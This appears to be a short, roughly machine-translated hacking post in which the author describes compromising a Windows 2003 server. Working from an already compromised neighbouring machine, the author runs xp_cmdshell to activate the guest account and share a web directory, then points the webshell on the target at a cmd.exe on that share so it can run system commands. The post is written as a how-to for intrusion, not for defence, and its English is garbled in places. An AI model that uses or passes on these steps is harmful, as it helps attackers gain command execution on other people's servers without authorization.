Article author: pt007 （article is very concise, but make it so difficult
Recently in the invasion of Win2003 when found default case not use the system comes with the cmd. exe files to execute system commands, upload the cmd. exe file because the file is too big to fail, then I pass a station adjacent to the machine's file share successfully upload the cmd. exe file, the specific process is as follows: We have acquired the adjacent machine 192.168.1.1-administrator privileges, use SQL's xp_cmdshell command executes the following operations: net user guest /active:yes open the guest user to allow file sharing anonymous access net share the web=d:\the web the WEB directory sharing
Then in the target machine on the WEBSHELL on the shell path inside the input: \\192.168.1.1\web\cmd.exe
Finally, on the figure of the SHELL path to c:\in cmd. exe to the normal operating system commands.
Since cmd. exe by package upload to the server, I suggest which experts to write an ASP-based RAR decompression software to easy 2 0 0 3 under the server in the upload cmd. exe program.